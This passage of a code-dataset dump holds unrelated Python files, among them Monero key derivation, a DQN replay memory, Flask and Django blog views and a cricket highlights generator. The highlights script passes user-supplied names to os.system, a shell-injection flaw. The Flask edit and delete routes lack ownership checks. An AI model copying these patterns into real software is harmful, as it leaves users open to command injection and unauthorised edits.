distribution_strata_ends) )\n\n # Calculate beta growth factor (linearly annealed till end of training)\n self.beta_grad = (1.0 - self.beta_zero) / (self.mem_prior_beta_anneal_max - self.hp.OBSERVE)\n\n\n def _sort_memory( self ):\n # print \"SORTING\"\n # tic = time.time( )\n self.memory = deque( sorted( self.memory, key=itemgetter( 0 ), reverse=False ) )\n # print \"sort toc = \", time.time( ) - tic\n\n\n def _get_rank_prioritisation_sample( self, step ):\n # From Schaul et al. 
2016\n\n curr_mem_length = self.memory.__len__( )\n # Find closest precomputed distribution by size\n distribution_idx = int( np.floor( float( curr_mem_length ) / self.hp.MEM_SIZE * self.num_partitions ) )\n distribution_idx = min( distribution_idx, self.distribution_list.__len__( ) )\n (distribution_pdf, distribution_strata_ends) = self.distribution_list[ distribution_idx - 1 ]\n N = distribution_idx * self.partition_division\n\n # Create table to store indices (by rank)\n # In reality the underlying array-based binary heap\n # is used as an approximation of a ranked (sorted) array\n rank_indices = [ ]\n indices = [ ]\n\n # Perform stratified sampling\n for n in range( self.hp.BATCH_SIZE ):\n x1 = distribution_strata_ends[ n ]\n x2 = distribution_strata_ends[ n + 1 ]\n # print \"x1=\",x1\n # print \"x2=\",x2\n rank_indices.append( random.sample( range( int( x1 ), int( x2 ) ), 1 )[ 0 ] )\n # print \"rankIndices = \",rankIndices[n]\n indices.append( curr_mem_length - rank_indices[ n ] - 1 )\n\n # update beta\n beta = min( self.beta_zero + (step - self.hp.OBSERVE) * self.beta_grad, 1 )\n\n # Compute importance-sampling weights w = (N * p(rank))^-beta\n w = np.power( distribution_pdf[ rank_indices ] * N, -beta )\n\n # Find max importance-sampling weight for normalisation\n w_max = np.max( w )\n\n # Normalise weights so updates only scale downwards (for stability)\n w /= w_max # Max weight will be 1\n\n # todo, don't know what to do with w yet\n # - i think the idea is to multiply the TD_error by this term at some point\n\n mini_batch = [ ]\n mini_batch_idx = [ ]\n for cc in range( self.hp.BATCH_SIZE ):\n mini_batch_idx.append( indices[ cc ] )\n mini_batch.append( self.memory[ indices[ cc ] ] )\n\n return mini_batch, mini_batch_idx, w\n\n\n\n def _get_random_sample( self ):\n mini_batch_idx = random.sample( range( min( self.hp.MEM_SIZE, self.memory.__len__( ) ) ), self.hp.BATCH_SIZE )\n mini_batch = [ self.memory[ idx ] for idx in mini_batch_idx ]\n return mini_batch, mini_batch_idx\n","sub_path":"ReinforcementLearning/DQN/Learners/Memory.py","file_name":"Memory.py","file_ext":"py","file_size_in_byte":6204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"620374090","text":"# https://www.leetfree.com/problems/meeting-rooms-ii.html#\nimport heapq\n\n\nclass Interval:\n def __init__(self, start, end):\n self.start, self.end = start, end\n\n\ndef min_meeting_rooms(intervals):\n if not intervals:\n return 0\n\n intervals.sort(key=lambda interval: interval.start)\n\n min_heap = [intervals[0].end]\n for interval in intervals[1:]:\n if interval.start >= min_heap[0]:\n heapq.heappushpop(min_heap, interval.end)\n else:\n heapq.heappush(min_heap, interval.end)\n\n return len(min_heap)\n\n\nif __name__ == '__main__':\n intervals = [Interval(0, 30), Interval(5, 10), Interval(15, 20), Interval(20, 30)]\n print(min_meeting_rooms(intervals))\n","sub_path":"Problems/leetcode/Meeting_Rooms_II_253.py","file_name":"Meeting_Rooms_II_253.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"190810625","text":"# Copyright (c) 2021 Emanuele Bellocchia\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# 
copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\n\n# Imports\nfrom __future__ import annotations\nfrom functools import lru_cache\nfrom typing import Optional, Union\nfrom bip_utils.addr import XmrAddr\nfrom bip_utils.ecc import Ed25519Monero, Ed25519MoneroPrivateKey, IPrivateKey, IPublicKey\nfrom bip_utils.monero.monero_ex import MoneroKeyError\nfrom bip_utils.monero.monero_keys import MoneroPrivateKey, MoneroPublicKey\nfrom bip_utils.utils import ConvUtils, CryptoUtils\n\n\nclass MoneroConst:\n \"\"\" Class container for Monero keys constants. \"\"\"\n\n # Address main net version\n ADDR_MAIN_NET_VER: bytes = b\"\\x12\"\n # Address checksum length in bytes\n ADDR_CHECKSUM_BYTE_LEN: int = 4\n\n # Subaddress main net version\n SUBADDR_MAIN_NET_VER: bytes = b\"\\x2a\"\n # Subaddress prefix\n SUBADDR_PREFIX: bytes = b\"SubAddr\\x00\"\n # Subaddress maximum index\n SUBADDR_MAX_IDX: int = 2**32 - 1\n # Subaddress index length in byte\n SUBADDR_IDX_BYTE_LEN: int = 4\n\n\nclass MoneroUtils:\n \"\"\" Class container for Monero utility functions. \"\"\"\n\n @staticmethod\n def ScReduce(data_bytes: bytes) -> bytes:\n \"\"\" Convert the specified bytes to integer and return its lowest 32-bytes modulo ed25519-order.\n This ensures that the result is a valid ed25519 scalar to be used as Monero private key.\n\n Args:\n data_bytes (bytes): Data bytes\n\n Returns:\n bytes: Lowest 32-bytes modulo ed25519-order\n \"\"\"\n data_int = ConvUtils.BytesToInteger(data_bytes, endianness=\"little\")\n return ConvUtils.IntegerToBytes(data_int % Ed25519Monero.Order(), bytes_num=32, endianness=\"little\")\n\n\nclass Monero:\n \"\"\" Monero class. It allows to compute Monero keys and addresses/subaddresses. 
\"\"\"\n\n @classmethod\n def FromSeed(cls,\n seed_bytes: bytes) -> Monero:\n \"\"\" Create from seed bytes.\n\n Args:\n seed_bytes (bytes): Seed bytes\n\n Returns:\n Monero object: Monero object\n \"\"\"\n priv_skey_bytes = (seed_bytes\n if len(seed_bytes) == Ed25519MoneroPrivateKey.Length()\n else CryptoUtils.Kekkak256(seed_bytes))\n return cls.FromPrivateSpendKey(MoneroUtils.ScReduce(priv_skey_bytes))\n\n @classmethod\n def FromBip44PrivateKey(cls,\n priv_key: Union[bytes, IPrivateKey]) -> Monero:\n \"\"\" Create from Bip44 private key bytes.\n\n Args:\n priv_key (bytes or IPrivateKey): Private key\n\n Returns:\n Monero object: Monero object\n \"\"\"\n if not isinstance(priv_key, bytes):\n priv_key = priv_key.Raw().ToBytes()\n return cls.FromPrivateSpendKey(MoneroUtils.ScReduce(CryptoUtils.Kekkak256(priv_key)))\n\n @classmethod\n def FromPrivateSpendKey(cls,\n priv_skey: Union[bytes, IPrivateKey]) -> Monero:\n \"\"\" Create from private spend key.\n\n Args:\n priv_skey (bytes or IPrivateKey): Private spend key\n\n Returns:\n Monero object: Monero object\n\n Raises:\n MoneroKeyError: If the key constructed from the bytes is not valid\n \"\"\"\n return cls(priv_key=priv_skey)\n\n @classmethod\n def FromWatchOnly(cls,\n priv_vkey: Union[bytes, IPrivateKey],\n pub_skey: Union[bytes, IPublicKey]) -> Monero:\n \"\"\" Create from private view key and public spend key (i.e. watch-only wallet).\n\n Args:\n priv_vkey (bytes or IPrivateKey): Private view key\n pub_skey (bytes or IPublicKey) : Public spend key\n\n Returns:\n Monero object: Monero object\n\n Raises:\n MoneroKeyError: If the key constructed from the bytes is not valid\n \"\"\"\n return cls(priv_key=priv_vkey,\n pub_key=pub_skey)\n\n def __init__(self,\n priv_key: Union[bytes, IPrivateKey],\n pub_key: Optional[Union[bytes, IPublicKey]] = None) -> None:\n \"\"\" Construct class.\n\n Args:\n priv_key (bytes or IPrivateKey): Private key (view key if watch-only wallet, otherwise spend key)\n pub_key (bytes or IPublicKey) : Public key (spend key, only needed for watch-only wallets, otherwise None)\n\n Returns:\n Monero object: Monero object\n\n Raises:\n MoneroKeyError: If the key constructed from the bytes is not valid\n \"\"\"\n\n # Private key object\n if pub_key is None:\n self.m_priv_skey = MoneroPrivateKey.FromBytesOrKeyObject(priv_key)\n self.m_priv_vkey = self.__ViewFromSpendKey(self.m_priv_skey)\n self.m_pub_skey = self.m_priv_skey.PublicKey()\n self.m_pub_vkey = self.m_priv_vkey.PublicKey()\n # Watch-only object\n else:\n self.m_priv_skey = None\n self.m_priv_vkey = MoneroPrivateKey.FromBytesOrKeyObject(priv_key)\n self.m_pub_skey = MoneroPublicKey.FromBytesOrKeyObject(pub_key)\n self.m_pub_vkey = self.m_priv_vkey.PublicKey()\n\n def IsWatchOnly(self) -> bool:\n \"\"\" Return if it's a watch-only object.\n\n Returns:\n bool: True if watch-only, false otherwise\n \"\"\"\n return self.m_priv_skey is None\n\n def PrivateSpendKey(self) -> MoneroPrivateKey:\n \"\"\" Return the private spend key.\n\n Returns:\n MoneroPrivateKey object: MoneroPrivateKey object\n\n Raises:\n MoneroKeyError: If the class is watch-only\n \"\"\"\n if self.IsWatchOnly():\n raise MoneroKeyError(\"Watch-only class has not a private spend key\")\n return self.m_priv_skey\n\n def PrivateViewKey(self) -> MoneroPrivateKey:\n \"\"\" Return the private view key.\n\n Returns:\n MoneroPrivateKey object: MoneroPrivateKey object\n \"\"\"\n return self.m_priv_vkey\n\n def PublicSpendKey(self) -> MoneroPublicKey:\n \"\"\" Return the public spend key.\n\n Returns:\n 
MoneroPublicKey object: MoneroPublicKey object\n \"\"\"\n return self.m_pub_skey\n\n def PublicViewKey(self) -> MoneroPublicKey:\n \"\"\" Return the public view key.\n\n Returns:\n MoneroPublicKey object: MoneroPublicKey object\n \"\"\"\n return self.m_pub_vkey\n\n @lru_cache()\n def PrimaryAddress(self) -> str:\n \"\"\" Return the primary address.\n\n Returns:\n str: Primary address string\n \"\"\"\n return XmrAddr.EncodeKey(self.m_pub_skey.KeyObject(),\n self.m_pub_vkey.KeyObject(),\n MoneroConst.ADDR_MAIN_NET_VER)\n\n @lru_cache()\n def SubAddress(self,\n minor_idx: int,\n major_idx: int = 0) -> str:\n \"\"\" Return the specified subaddress.\n\n Args:\n minor_idx (int) : Minor index\n major_idx (int, optional): Major index (i.e. account index)\n\n Returns:\n str: Subaddress string\n\n Raises:\n ValueError: If one of the indexes is not valid\n \"\"\"\n if minor_idx < 0 or minor_idx > MoneroConst.SUBADDR_MAX_IDX:\n raise ValueError(\"Invalid minor index (%d)\" % minor_idx)\n if major_idx < 0 or major_idx > MoneroConst.SUBADDR_MAX_IDX:\n raise ValueError(\"Invalid major index (%d)\" % major_idx)\n\n return self.__ComputeSubAddress(minor_idx, major_idx)\n\n def __ComputeSubAddress(self,\n minor_idx: int,\n major_idx: int) -> str:\n \"\"\" Compute subaddress.\n\n Args:\n minor_idx (int): Minor index\n major_idx (int): Major index (i.e. account index)\n\n Returns:\n str: Subaddress string\n\n Raises:\n ValueError: If one of the indexes is not valid\n \"\"\"\n\n # Subaddress 0,0 is the primary address\n if minor_idx == 0 and major_idx == 0:\n return self.PrimaryAddress()\n\n # Convert indexes to bytes\n major_idx_bytes = ConvUtils.IntegerToBytes(major_idx, bytes_num=MoneroConst.SUBADDR_IDX_BYTE_LEN, endianness=\"little\")\n minor_idx_bytes = ConvUtils.IntegerToBytes(minor_idx, bytes_num=MoneroConst.SUBADDR_IDX_BYTE_LEN, endianness=\"little\")\n\n # m = Kekkak256(\"SubAddr\" + master_priv_vkey + major_idx + minor_idx)\n m = CryptoUtils.Kekkak256(MoneroConst.SUBADDR_PREFIX + self.m_priv_vkey.Raw().ToBytes() + major_idx_bytes + minor_idx_bytes)\n m_int = ConvUtils.BytesToInteger(m, endianness=\"little\")\n\n # Compute subaddress public spend key\n # D = master_pub_skey + m * B\n subaddr_pub_skey = self.m_pub_skey.KeyObject().Point() + (Ed25519Monero.Generator() * m_int)\n\n # Compute subaddress public view key\n # C = master_priv_vkey * D\n subaddr_pub_vkey = subaddr_pub_skey * self.m_priv_vkey.Raw().ToInt(\"little\")\n\n # Encode subaddress\n return XmrAddr.EncodeKey(subaddr_pub_skey.Raw().ToBytes(),\n subaddr_pub_vkey.Raw().ToBytes(),\n MoneroConst.SUBADDR_MAIN_NET_VER)\n\n @staticmethod\n def __ViewFromSpendKey(priv_skey: MoneroPrivateKey) -> MoneroPrivateKey:\n \"\"\" Get the private view key from the private spend key.\n\n Args:\n priv_skey (MoneroPrivateKey object): Private spend key\n\n Returns:\n MoneroPrivateKey object: Private view key\n \"\"\"\n priv_vkey_bytes = MoneroUtils.ScReduce(CryptoUtils.Kekkak256(priv_skey.Raw().ToBytes()))\n return MoneroPrivateKey.FromBytes(priv_vkey_bytes)\n","sub_path":"bip_utils/monero/monero.py","file_name":"monero.py","file_ext":"py","file_size_in_byte":10716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"335274378","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom django.shortcuts import render\n\ndef index(request):\n\tcontext = {\n\t\t'info':\"百度\"\n\t}\n\treturn 
render(request,'index.html',context=context)\n\n\n","sub_path":"TryDjangoTest/chapter03/template_autoescape_demo/template_autoescape_demo/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"428667525","text":"import json\n\ndef main():\n    mydict = {\n        'name': '骆昊 ',\n        'qq': 34654,\n        'age': 38,\n        'friends': [\n            {'brand': 'Auto', 'max_speed': 123},\n            {'brand': 'QQ', 'max_speed': 100},\n            {'brand': 'Benz', 'max_speed': 90}\n        ]\n    }\n    try:\n        with open('date.json', 'r', encoding='utf-8') as fs:\n            json.load(fs)\n\n    except IOError as e:\n        print(e)\n\n\nif __name__ == '__main__':\n    main()","sub_path":"day15/text/file6.py","file_name":"file6.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"18503692","text":"#!/usr/bin/env python\nimport shlex, subprocess\nimport sys\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\nNUM_REDUCERS = 3\n\ndef main():\n\tdoc_process_args = \"python assignment4_p/coordinator.py --mapperPath=assignment4_p/document_store/doc_mapper.py --reducerPath=assignment4_p/document_store/doc_reducer.py --jobPath=assignment5/df_jobs --numReducers=%d\" % NUM_REDUCERS\n\tlogging.debug(\"Doc_Server mapReduce param: %s\" % doc_process_args)\n\tdoc_process_args = shlex.split(doc_process_args)\n\tdoc_process = subprocess.Popen(doc_process_args)\n\tdoc_return_code = doc_process.wait()\n\tif doc_return_code != 0:\n\t\tlogging.error(\"MapReduce Doc return code %d\" % doc_return_code)\n\t\tsys.exit(2)\n\t\n\tinverted_process_args = \"python assignment4_p/coordinator.py --mapperPath=assignment4_p/inverted_index/index_mapper.py --reducerPath=assignment4_p/inverted_index/index_reducer.py --jobPath=assignment5/i_df_jobs --numReducers=%d\" % NUM_REDUCERS\n\tlogging.debug(\"Inverted_Server mapReduce param: %s\" % inverted_process_args)\n\tinverted_process_args = shlex.split(inverted_process_args)\n\tinverted_process = subprocess.Popen(inverted_process_args)\n\tinverted_return_code = inverted_process.wait()\n\tif inverted_return_code != 0:\n\t\tlogging.error(\"MapReduce Inverted return code %d\" % inverted_return_code)\n\t\tsys.exit(2)\n\t\n\ttf_idf_args = \"python assignment4_p/coordinator.py --mapperPath=assignment4_p/idf_index/idf_mapper.py --reducerPath=assignment4_p/idf_index/idf_reducer.py --jobPath=assignment5/idf_jobs --numReducers=1\" \n\tlogging.debug(\"IDF mapReduce param: %s\" % tf_idf_args)\n\ttf_idf_args = shlex.split(tf_idf_args)\n\tidf_process = subprocess.Popen(tf_idf_args)\n\tidf_return_code = idf_process.wait()\n\tif idf_return_code != 0:\n\t\tlogging.error(\"MapReduce IDF return code %d\" % idf_return_code)\n\t\tsys.exit(2)\n\t\t\nif __name__ == \"__main__\":\n\tmain()\n\t\n\n\n","sub_path":"sea-assignments/assignment5/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"615348729","text":"from flask import render_template, request, flash, redirect, url_for\nfrom flask_login import login_user, logout_user, login_required\nfrom . 
import main_blueprint as main\nfrom .forms import SignUp, SignIn, Search, AddPost, EditProfile, EditPost, DeletePost\nfrom ..models import Blogger, Blog\nfrom blog import db\nfrom config import POSTS_PER_PAGE\n\n\n@main.route('/')\n@main.route('/home')\ndef index():\n return render_template('index.html')\n\n\n@main.route('/sign-up', methods=['GET', 'POST'])\ndef sign_up():\n form = SignUp()\n if request.method == 'POST' and form.validate():\n new_blogger = Blogger(username = form.username.data,\n first_name = form.first_name.data,\n last_name = form.last_name.data,\n email = form.email.data,\n password = form.password.data)\n\n db.session.add(new_blogger)\n db.session.commit()\n flash('You registered successfully and can now log in')\n return redirect(url_for('main.index'))\n return render_template('sign-up.html', form=form)\n\n\n@main.route('/sign-in', methods=['GET', 'POST'])\ndef sign_in():\n form = SignIn()\n if request.method == 'POST':\n if form.validate_on_submit():\n blogger = Blogger.query.filter_by(username=form.username.data).first()\n if blogger is not None and blogger.verify_password(form.password.data):\n login_user(blogger)\n return redirect(url_for('main.dashboard', username=form.username.data))\n flash('You successfully logged in')\n else:\n flash('Invalid email and/or password')\n return render_template('sign-in.html', form=form)\n\n\n@main.route('/sign-out')\n@login_required\ndef sign_out():\n logout_user()\n flash('You logged out')\n return redirect(url_for('main.index'))\n\n\n@main.route('//profile/edit', methods=['GET', 'POST'])\n@login_required\ndef edit_profile(username):\n blogger = Blogger.query.filter_by(username=username).first()\n form = EditProfile(obj=blogger)\n form.populate_obj(blogger)\n if form.validate_on_submit():\n blogger.username = form.username.data\n blogger.first_name = form.first_name.data\n blogger.last_name = form.last_name.data\n blogger.email = form.email.data\n blogger.about_me = form.about_me.data\n\n db.session.add(blogger)\n db.session.commit()\n flash(\"Changes applied to profile\")\n return redirect(url_for('main.dashboard', username=form.username.data))\n return render_template('edit-profile.html', blogger=blogger, form=form)\n\n\n@main.route('/Dashboard/', methods=['GET', 'POST'])\n@main.route('/Dashboard//', methods=['GET', 'POST'])\n@login_required\ndef dashboard(username, page=1):\n form = Search()\n blogger = Blogger.query.filter_by(username=username).first()\n blogs = Blog.query.filter_by(blogger=blogger.id).paginate(page, POSTS_PER_PAGE, True)\n if form.validate_on_submit():\n search_results = Blog.query.filter(Blog.title.contains(form.item.data))\\\n .paginate(page, POSTS_PER_PAGE, True)\n return render_template('search.html', form=form, searchResults=search_results, blogger=blogger)\n return render_template('dashboard.html', form=form, blogs=blogs, blogger=blogger)\n\n\n@main.route('/Dashboard///new', methods=['GET', 'POST'])\n@login_required\ndef add_post(username, blogger_id):\n form = AddPost()\n if request.method == 'POST':\n if form.validate_on_submit():\n new_blog = Blog(title=form.title.data, content=form.content.data, blogger=blogger_id)\n db.session.add(new_blog)\n db.session.commit()\n flash(\"You added a new blog post\")\n return redirect(url_for('main.dashboard', username=username))\n return render_template('add-post.html', form=form, username=username, blogger_id=blogger_id)\n\n\n@main.route('/Dashboard///edit', methods=['GET', 'POST'])\n@login_required\ndef edit_post(username, blog_id):\n blog_to_edit = 
Blog.query.filter_by(id=blog_id).first()\n form = EditPost(obj=blog_to_edit)\n form.populate_obj(blog_to_edit)\n if form.validate_on_submit():\n blog_to_edit.title = form.title.data\n blog_to_edit.content = form.content.data\n db.session.add(blog_to_edit)\n db.session.commit()\n flash(\"Changes applied to a blog post\")\n return redirect(url_for('main.dashboard', username=username))\n return render_template('edit-post.html', form=form, username=username, blog_id=blog_id)\n\n\n@main.route('/Dashboard///delete', methods=['GET', 'POST'])\n@login_required\ndef delete_post(username, blog_id):\n form = DeletePost()\n blog_to_delete = Blog.query.filter_by(id=blog_id).first()\n if request.method == 'POST':\n db.session.delete(blog_to_delete)\n db.session.commit()\n flash(\"Blog post deleted\")\n return redirect(url_for('main.dashboard', username=username))\n return render_template('delete-post.html', form=form, username=username, blogToDelete=blog_to_delete)\n\n\n@main.route('/blogs')\n@main.route('/blogs/', methods=['GET', 'POST'])\ndef view_blogs(page=1):\n blogs = Blog.query.paginate(page, POSTS_PER_PAGE, True)\n return render_template('blogs.html', blogs=blogs)\n\n\n@main.route('/bloggers')\ndef view_bloggers():\n bloggers = Blogger.query.all()\n return render_template('bloggers.html', bloggers=bloggers)\n\n\n\n","sub_path":"blog/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5546,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"209610778","text":"import argparse, os, requests\nfrom collections import defaultdict\n\nfrom search import search\n\n#OUTPUT_FOLDER='./static/stream/'\nOUTPUT_FOLDER='./stream/'\ndef create_text_file(clip_names, fname):\n out_file = f'{OUTPUT_FOLDER}{fname}.txt'\n # Allowing only 10 clips\n clip_names = clip_names[:10]\n with open(out_file, 'w') as f:\n f.write('\\n'.join([f'file {fn}' for fn in clip_names]))\n \n return out_file\n\n\ndef get_highlights(batsman, bowler, shot, ball_type, runs, wicket):\n \"\"\"\n Summary: Returns the path of the compiled highlights video\n\n Parameters:\n batsman(str): Name of the batsman\n bowler(str) : Name of the bowler\n shot(str): Type of shot played\n ball_type(str): Ball type\n runs(str): Runs\n wicket(bool): true or false, None for no value\n\n Returns:\n 'out_video_path': Path to the combined highlight video clip\n \"\"\"\n\n filters = defaultdict()\n fname = ''\n\n if batsman:\n filters['batsman'] = batsman\n fname += batsman\n else:\n filters['batsman'] = ''\n\n if bowler:\n filters['bowler'] = bowler\n fname += bowler\n else:\n filters['bowler'] = ''\n\n if shot:\n filters['shot'] = shot\n fname += shot\n else:\n filters['shot'] = ''\n\n if ball_type:\n filters['ball_type'] = ball_type\n fname += ball_type\n else:\n filters['ball_type'] = ''\n\n if runs:\n filters['runs'] = runs\n fname += runs\n else:\n filters['runs'] = ''\n\n if wicket:\n filters['wicket']=True\n fname += 'wicket'\n else:\n filters['wicket']=None\n\n print(filters)\n fname = fname.strip()\n out_video_path = f'{OUTPUT_FOLDER}{fname}.mp4'\n\n if (os.path.isfile(out_video_path)):\n print('File already exists')\n else:\n clip_names = search(filters)\n txt_file = create_text_file(clip_names, fname)\n os.system(f'ffmpeg -f concat -safe 0 -i {txt_file} -c copy {out_video_path}')\n print(f'File created at {out_video_path}')\n\n return f'stream/{fname}.mp4'\n\ndef badmintonHighlightsFunction(inputUrl, email):\n URL = 'http://34.83.101.230:5000/badminton'\n PARAMS={'url': inputUrl,\n 
'start_time': '00:05:00',\n 'duration': '00:04:00' ,\n 'email': email\n } \n r = requests.get(url = URL, params = PARAMS)\n return 'Done'\n\ndef tennisHighlightsFunction(inputUrl,email):\n URL = 'http://34.83.101.230:5000/tennis'\n PARAMS={'url': inputUrl,\n 'start_time': '00:05:00',\n 'duration': '00:04:00' ,\n 'email': email\n }\n r = requests.get(url = URL, params = PARAMS)\n return 'Done'\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='Generates highlights for cricket videos')\n parser.add_argument('-b', '--batsman', help='Cricinfo link for the commentary')\n parser.add_argument('-l', '--bowler', help='Cricinfo link for the commentary')\n parser.add_argument('-s', '--shot', help='CSV file to write the data')\n parser.add_argument('-t', '--ball_type', help='Corodinates for the over position')\n parser.add_argument('-r', '--runs', help='First innings commentary for last over.')\n parser.add_argument('-w', '--wicket', help='Wickets included or not, 0 for no 1 for yes')\n\n args = parser.parse_args()\n\n get_highlights(args.batsman, args.bowler, args.shot, args.ball_type, args.runs, args.wicket)\n","sub_path":"server/highlights.py","file_name":"highlights.py","file_ext":"py","file_size_in_byte":3446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"122779915","text":"# -*- coding: utf-8 -*-\n\"\"\"\nVelogames - test algorithms\n\nAuthor: Klemen Ziberna\n\"\"\"\n\n#####################################\n# GLOBAL VARIABLES\n\nFILE_PATH = \"C:\\klemen\\Repositories\\ProCyclingStats\\Analysis_Tables\\Riders_Points\"\nCSV_FILES = [\"rider1.csv\",\n \"rider2.csv\",\n \"rider3.csv\",\n \"rider4.csv\",\n \"rider5.csv\",\n \"rider6.csv\",\n \"rider7.csv\",\n \"rider8.csv\",\n \"rider9.csv\"\n ]\n\n#####################################\n# LIBRARIES\n\nimport pandas as pd\nimport os\nimport chardet\n\n#####################################\n# FUNCTIONS\n\ndef open_csv_chardet(input_csv_file):\n \"\"\"\n Function opens the csv file, detects correct encoding, then open\n the same file as pandas df with correct encoding\n \"\"\"\n with open(input_csv_file, 'rb') as f:\n result = chardet.detect(f.read()) # or readline if the file is large\n \n csv_df = pd.read_csv(input_csv_file, encoding=result['encoding'])\n \n return csv_df\n\n\n#####################################\n# MAIN PROGRAM\n\n\n# Open the files\nrider1_df = open_csv_chardet(os.path.join(FILE_PATH, CSV_FILES[0]))\nrider2_df = open_csv_chardet(os.path.join(FILE_PATH, CSV_FILES[1]))\nrider3_df = open_csv_chardet(os.path.join(FILE_PATH, CSV_FILES[2]))\nrider4_df = open_csv_chardet(os.path.join(FILE_PATH, CSV_FILES[3]))\nrider5_df = open_csv_chardet(os.path.join(FILE_PATH, CSV_FILES[4]))\nrider6_df = open_csv_chardet(os.path.join(FILE_PATH, CSV_FILES[5]))\nrider7_df = open_csv_chardet(os.path.join(FILE_PATH, CSV_FILES[6]))\nrider8_df = open_csv_chardet(os.path.join(FILE_PATH, CSV_FILES[7]))\nrider9_df = open_csv_chardet(os.path.join(FILE_PATH, CSV_FILES[8]))\n\n\n\n# Selection algorithm\n\n# Conditions\nsel_category = 'PCS Ranking - Individual - Value'\n#sel_category = 'PCS Season - Distance - Position'\n#sel_category = 'Form_2month''\n\nmax_cost = 100 # max cost\nbest_combination = {'Value':0,\n 'Combination': \"\",\n 'Cost': 0} \n\n# Modified algorithm (less levels)\n\n \n# Main loop\n\nfor index1 in range(0,len(rider1_df)):\n print('Rider1: ' + str(index1))\n current_cost = rider1_df['Cost'][index1]\n if current_cost > max_cost - 8*4:\n continue\n\n \n for 
index2 in range(0,len(rider2_df)):\n print('-Rider2: ' + str(index2))\n current_cost = rider1_df['Cost'][index1] \\\n + rider2_df['Cost'][index2] \n\n if current_cost > max_cost - 7*4:\n continue\n\n \n for index3 in range(0,len(rider3_df)):\n print('--Rider3: ' + str(index3))\n current_cost = rider1_df['Cost'][index1] \\\n + rider2_df['Cost'][index2] \\\n + rider3_df['Cost'][index3]\n \n if current_cost > max_cost - 6*4:\n continue\n \n \n for index4 in range(0,len(rider4_df)):\n #print('---Rider4: ' + str(index4))\n current_cost = rider1_df['Cost'][index1] \\\n + rider2_df['Cost'][index2] \\\n + rider3_df['Cost'][index3] \\\n + rider4_df['Cost'][index4] \n \n if current_cost > max_cost - 5*4:\n continue\n \n \n for index5 in range(0,len(rider5_df)):\n #print('----Rider5: ' + str(index5))\n current_cost = rider1_df['Cost'][index1] \\\n + rider2_df['Cost'][index2] \\\n + rider3_df['Cost'][index3] \\\n + rider4_df['Cost'][index4] \\\n + rider5_df['Cost'][index5] \n \n if current_cost > max_cost - 4*4:\n continue\n \n \n# for index6 in range(0,len(rider6_df)):\n# print('-----Rider6: ' + str(index6))\n# current_cost = rider1_df['Cost'][index1] \\\n# + rider2_df['Cost'][index2] \\\n# + rider3_df['Cost'][index3] \\\n# + rider4_df['Cost'][index4] \\\n# + rider5_df['Cost'][index5] \\\n# + rider6_df['Cost'][index6] \n# \n# if current_cost > max_cost - 3*4:\n# continue\n# \n# \n# for index7 in range(0,len(rider7_df)):\n# current_cost = rider1_df['Cost'][index1] \\\n# + rider2_df['Cost'][index2] \\\n# + rider3_df['Cost'][index3] \\\n# + rider4_df['Cost'][index4] \\\n# + rider5_df['Cost'][index5] \\\n# + rider6_df['Cost'][index6] \\\n# + rider7_df['Cost'][index7] \n# \n# if current_cost > max_cost - 2*4:\n# continue\n# \n# \n# for index8 in range(0,len(rider8_df)):\n# current_cost = rider1_df['Cost'][index1] \\\n# + rider2_df['Cost'][index2] \\\n# + rider3_df['Cost'][index3] \\\n# + rider4_df['Cost'][index4] \\\n# + rider5_df['Cost'][index5] \\\n# + rider6_df['Cost'][index6] \\\n# + rider7_df['Cost'][index7] \\\n# + rider8_df['Cost'][index8] \n# \n# if current_cost > max_cost - 1*4:\n# continue\n \n \n for index9 in range(0,len(rider9_df)):\n current_cost = rider1_df['Cost'][index1] \\\n + rider2_df['Cost'][index2] \\\n + rider3_df['Cost'][index3] \\\n + rider4_df['Cost'][index4] \\\n + rider5_df['Cost'][index5] \\\n + rider9_df['Cost'][index9] \n #+ rider6_df['Cost'][index6] \\\n #+ rider7_df['Cost'][index7] \\\n #+ rider8_df['Cost'][index8] \\\n #+ rider9_df['Cost'][index9] \n \n if current_cost > max_cost - 3*4:\n continue\n \n selection_value = \\\n rider1_df[sel_category][index1] \\\n + rider2_df[sel_category][index2] \\\n + rider3_df[sel_category][index3] \\\n + rider4_df[sel_category][index4] \\\n + rider5_df[sel_category][index5] \\\n + rider9_df[sel_category][index9]\n #+ rider6_df[sel_category][index6] \\\n #+ 